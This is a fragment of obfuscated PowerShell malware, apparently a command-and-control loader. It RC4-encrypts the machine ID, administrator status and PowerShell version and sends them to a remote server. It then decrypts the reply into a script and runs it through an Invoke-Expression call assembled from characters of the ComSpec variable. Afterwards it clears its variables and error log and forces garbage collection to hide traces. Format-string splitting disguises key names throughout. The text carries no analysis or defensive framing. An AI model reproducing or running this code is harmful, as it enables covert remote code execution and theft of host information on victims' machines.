	for ($x = 0; $x -lt $buffer.Length; $x++){$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;[int]$t = ($s[$i] + $s[$j]) % 256;$buffer[$x] = $buffer[$x] -bxor $s[$t];}
	return $buffer
	}

	function Encrypt {
	param([string]$data)

	[Convert]::ToBase64String($(rc4 $ag[("{1}{0}" -f 'f','encut')].GetBytes($data) $ag[("{1}{0}" -f'cutf','en')].GetBytes($ag[("{1}{0}"-f 'kkey','s')])))
	}

	function Decrypt {
	param([string]$data)

	$ag[("{1}{2}{0}"-f'f','e','ncut')].GetString($(rc4 $([System.Convert]::FromBase64String($data)) $ag[("{0}{1}"-f 'enc','utf')].GetBytes($ag[("{0}{1}"-f 'skk','ey')])))
	}

	function get-construct {
	param([string]$out)
	$ag.add(("{0}{1}"-f'ske','y'), $($out[($out.length-33)..($out.length-2)]-join ''))
	$ag.add('scr', $($out[0..($out.length-34)]-join ''))
	}

	# seid, routed
	$ag.add(("{0}{1}"-f'sei','d'), ("{1}{0}{2}"-f 'out','r','ed:') + $(Encrypt $(SysMachineID)));
	if (Test-Administrator) {
	$eb='p=1'
	} else {
	$eb='p=0'
	}
	$de = Decrypt $(vzuhdata $($($ag[("{0}{1}"-f'p','ref')] + $(Encrypt $(((("{1}{0}{2}"-f'a','act=p','ll{0}')) -F [CHAr]124)+ $eb + ((("{2}{1}{0}" -f'r=','e','HDYv')).REpLACe('HDY','\|'))+ $ag['ver'] + ((("{1}{0}"-f'aopcn=','O')).rePLACe('Oao',[strInG][cHar]124)) + $PSVersionTable.PSVersion.Major)))))
	$k=$de[$de.length-1] -join ''
	if ($k -eq 0) {
	get-construct $(Decrypt $(vzuhdata $($ag[("{0}{1}" -f'pr','ef')] + $(Encrypt $(((("{0}{1}{2}"-f'act','=fallK','ik')) -RePLaCE ([CHAR]75+[CHAR]105+[CHAR]107),[CHAR]124)+ $(SysMachineinfo))))))
	} else {
	get-construct $de
	}
	. ($eNV:coMsPec[4,26,25]-JoIN'') $ag['scr'];
	$de=$null;
	$ag.Remove('scr');
	$ag.Remove(("{0}{1}" -f 'p','ref'));
	$ag.Remove(("{1}{0}" -f 'key','sk'));
	$ag.Remove('ver');
	$ag.Remove(("{0}{1}" -f 'encut','f'))
	$Error.Clear()
	[GC]::Collect()
	[GC]::WaitForPendingFinalizers()
	Get-federerfegegfeg $ag
	}
	sdnfjshdklfhlj